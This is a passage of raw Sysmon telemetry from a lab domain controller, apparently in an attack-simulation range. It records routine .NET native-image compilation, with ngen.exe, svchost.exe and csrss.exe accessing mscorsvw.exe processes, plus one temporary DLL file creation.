13:21:27.006{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4557-6000-9B01-000000009A01}3044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005844Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:28.866{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4558-6000-A601-000000009A01}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005843Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:28.834{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4558-6000-A601-000000009A01}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005842Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:28.834{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4558-6000-A601-000000009A01}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005841Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:28.741{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4558-6000-A501-000000009A01}4660C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005840Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:28.725{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4558-6000-A501-000000009A01}4660C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005839Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:28.725{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4558-6000-A501-000000009A01}4660C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005838Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:28.678{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4558-6000-A401-000000009A01}3456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005837Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:28.678{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4558-6000-A401-000000009A01}3456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005836Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:28.678{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4558-6000-A401-000000009A01}3456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005835Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:28.616{08A6967A-4558-6000-A301-000000009A01}3544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\dd8-0\Microsoft.Activities.Build.dll2021-01-14 13:21:28.616 10341000x80000000000000005834Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:28.412{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4558-6000-A301-000000009A01}3544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005833Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:28.412{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4558-6000-A301-000000009A01}3544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005832Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:28.412{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4558-6000-A301-000000009A01}3544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005831Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:28.178{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4558-6000-A201-000000009A01}1604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005830Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:28.162{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4558-6000-A201-000000009A01}1604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005829Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:28.162{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4558-6000-A201-000000009A01}1604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005828Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:28.131{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4558-6000-A101-000000009A01}1828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005827Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:28.131{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4558-6000-A101-000000009A01}1828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005826Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:28.131{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4558-6000-A101-000000009A01}1828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005825Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:28.084{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4558-6000-A001-000000009A01}4940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005824Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:28.084{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4558-6000-A001-000000009A01}4940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005823Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:28.084{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4558-6000-A001-000000009A01}4940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005850Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:29.272{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4559-6000-A801-000000009A01}2884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005849Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 